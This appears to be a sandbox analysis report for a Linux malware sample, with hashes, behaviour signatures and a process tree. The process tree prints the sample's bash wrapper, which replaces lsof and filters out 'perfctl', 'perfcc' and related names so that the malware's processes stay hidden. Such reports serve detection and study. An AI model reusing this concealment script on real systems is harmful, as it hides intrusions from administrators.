Overview

overview

6

Static

static

1

68272ec434...0e68e6

ubuntu-18.04-amd64

6

Analysis

  • max time kernel
    1s
  • max time network
    36s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240611-en
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    09-10-2024 08:33

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    68272ec4349f4f4be5178ed961c2f71590fab3d3c10a9760b33c5d845d0e68e6

  • Size

    15KB

  • MD5

    d18bc7dae6c4c9be5820fc46ec65f700

  • SHA1

    9ea77334980cee13ce80c1d33a7f6263d019035b

  • SHA256

    68272ec4349f4f4be5178ed961c2f71590fab3d3c10a9760b33c5d845d0e68e6

  • SHA512

    a00baaf81eec5f8a702c0483954bd000aa8bc94eef3f9415ddcc7a3bb62a68083dde74922285ea05ae6764824716a286dc152ff70521e193a000f45516175a05

  • SSDEEP

    192:RV3vw/dthpXd5VdFjzQp5PQfdzTH49PkHVTg0oi:Qd/ptjzQp5AY9P2

Score
6/10
credential_accessdiscovery

Malware Config

Signatures

  • Enumerates active TCP sockets 1 TTPs 1 IoCs

    Gets active TCP sockets from /proc virtual filesystem.

    discovery
  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Reads process memory 1 TTPs 64 IoCs

    Read the memory of a process through the /proc virtual filesystem. This can be used to steal credentials.

    credential_access
  • Reads system network configuration 1 TTPs 18 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

    discovery
  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

    discovery

Processes

  • /tmp/68272ec4349f4f4be5178ed961c2f71590fab3d3c10a9760b33c5d845d0e68e6
    /tmp/68272ec4349f4f4be5178ed961c2f71590fab3d3c10a9760b33c5d845d0e68e6
    1⤵
      PID:1511
    • /bin/bash
      /tmp/68272ec4349f4f4be5178ed961c2f71590fab3d3c10a9760b33c5d845d0e68e6 -c "exec '/tmp/68272ec4349f4f4be5178ed961c2f71590fab3d3c10a9760b33c5d845d0e68e6' \"\$@\"" /tmp/68272ec4349f4f4be5178ed961c2f71590fab3d3c10a9760b33c5d845d0e68e6
      1⤵
        PID:1511
      • /tmp/68272ec4349f4f4be5178ed961c2f71590fab3d3c10a9760b33c5d845d0e68e6
        /tmp/68272ec4349f4f4be5178ed961c2f71590fab3d3c10a9760b33c5d845d0e68e6
        1⤵
          PID:1511
        • /bin/bash
          /tmp/68272ec4349f4f4be5178ed961c2f71590fab3d3c10a9760b33c5d845d0e68e6 -c " #!/bin/bash if env|grep -q ABWTRX;then echo ABWTRX00;exit 0;fi r='lsof' p=\$(echo \"\$PATH\"|sed 's;/.local/bin;/usr/bin;g' 2>/dev/null) if [ \$? -ne 0 ];then p=\"\${a/\\/.local\\/bin//usr/bin}\" fi export PATH=\$p if env|grep -q AAZHDE; then \$r \$@ else \$r \$@ | grep -Fv -e 'perfcc' -e 'perfctl' -e '.dmesg' -e '.xdiag' -e 'gcwrap' fi " /tmp/68272ec4349f4f4be5178ed961c2f71590fab3d3c10a9760b33c5d845d0e68e6
          1⤵
            PID:1511
            • /bin/grep
              grep -q ABWTRX
              2⤵
                PID:1513
              • /usr/bin/env
                env
                2⤵
                  PID:1512
                • /bin/sed
                  sed "s;/.local/bin;/usr/bin;g"
                  2⤵
                    PID:1516
                  • /bin/grep
                    grep -q AAZHDE
                    2⤵
                      PID:1518
                    • /usr/bin/env
                      env
                      2⤵
                        PID:1517
                      • /bin/grep
                        grep -Fv -e perfcc -e perfctl -e .dmesg -e .xdiag -e gcwrap
                        2⤵
                          PID:1520
                        • /usr/bin/lsof
                          lsof
                          2⤵
                          • Enumerates active TCP sockets
                          • Reads process memory
                          • Reads system network configuration
                          • Reads runtime system information
                          PID:1519

                      Network

                      MITRE ATT&CK Enterprise v15

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads